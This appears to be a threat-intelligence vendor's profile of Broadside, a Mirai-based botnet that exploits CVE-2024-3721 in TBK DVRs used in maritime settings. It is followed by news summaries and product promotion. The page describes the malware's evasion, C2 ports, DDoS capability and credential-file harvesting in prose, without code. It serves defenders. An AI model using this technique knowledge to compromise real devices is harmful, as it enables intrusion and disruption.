Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareExploits 1 CVE

Broadside

Broadside is a Mirai-based botnet variant identified by Cydome that is active in the wild and targets vulnerable TBK Vision digital video recorder (DVR) devices, particularly those used in the maritime logistics sector and on vessels. It exploits CVE-2024-3721, a critical unauthenticated OS command injection vulnerability affecting TBK DVR-4104 and DVR-4216 devices via crafted HTTP POST requests to the /device.rsp endpoint. The affected products are also sold under rebranded names including CeNova, HVR Login, Night Owl, Novo, Pulnix, QSee, and Securus.

According to the provided reporting, Broadside uses a mass loader to execute multi-architecture payloads directly in memory and remove disk artifacts to evade detection. It supports DDoS activity, including UDP flooding, and uses payload polymorphism to hinder static defenses. The malware employs a custom command-and-control protocol, with reporting indicating communications over TCP/1026 and fallback on TCP/6969, and is described as using a unique Magic Header signature. Broadside also uses Netlink kernel sockets for stealthy, event-driven process monitoring and persistence.

Broadside includes a process-killer or exclusivity component described as a "Judge, Jury, and Executioner" module that terminates competing or hostile processes and maintains exclusive control of infected hosts. It attempts to harvest /etc/passwd and /etc/shadow, which researchers assessed could support foothold establishment, privilege escalation, and lateral movement beyond typical Mirai-style DDoS operations.

The campaign is assessed as a significant threat to maritime operators because compromised shipboard DVRs could expose CCTV feeds covering areas such as the bridge, cargo holds, and engine room, flood satellite communications, and potentially enable lateral movement toward critical OT systems. Reporting states the campaign had been active for several months when identified, and that over 50,000 exposed DVRs had been observed as potential targets. High-confidence indicators and traits mentioned in the content include exploitation of CVE-2024-3721 on TBK DVR devices, use of Netlink-based process monitoring, custom C2 with a Magic Header, UDP-flood DDoS capability, in-memory multi-architecture loading, credential harvesting from /etc/passwd and /etc/shadow, and process termination of competing malware or hostile processes.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2024-3721OS Command Injection in TBK DVR-4104 and DVR-4216Exploited in the wild

The Broadside malware infects TBK DVR devices impacted by CVE-2024-3721, an OS command injection flaw that can be exploited remotely for arbitrary code execution.

via security weeksecurityweek.com
ACTIVITY FEED

Recent activity

6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

6 SOURCESView more in app
securityaffairsNews
Dec 14, 2025
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 75

Broadside is a new variant of the Mirai botnet, active in the wild and likely used for DDoS attacks.

Read more
the hacker newsNews
Dec 11, 2025
ThreatsDay Bulletin: Spyware Alerts, Mirai Strikes, Docker Leaks, ValleyRAT Rootkit - and 20 More Stories

Mirai-based botnet variant that exploits a TBK DVR vulnerability, uses a custom C2 protocol and stealth techniques (e.g., Netlink kernel sockets, payload polymorphism), attempts to maintain exclusivity by killing competing processes, and harvests credential files (/etc/passwd, /etc/shadow) to establish foothold.

Read more
risky biz rssNews
Dec 10, 2025
Risky Bulletin: Linux adds PCIe encryption to help secure cloud servers

A new Mirai variant targeting TBK DVRs, especially in the maritime sector, to build an IoT botnet for malicious activities.

Read more
securityaffairsNews
Dec 9, 2025
Broadside botnet hits TBK DVRs, raising alarms for maritime logistics

Broadside is a Mirai-based botnet variant that targets TBK DVR devices, primarily in the maritime logistics sector. It exploits CVE-2024-3721 to compromise devices, enabling DDoS attacks, credential theft, privilege escalation, and lateral movement. It features custom C2 protocols, payload polymorphism, and process-killing modules for persistence and stealth.

Read more
+2 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.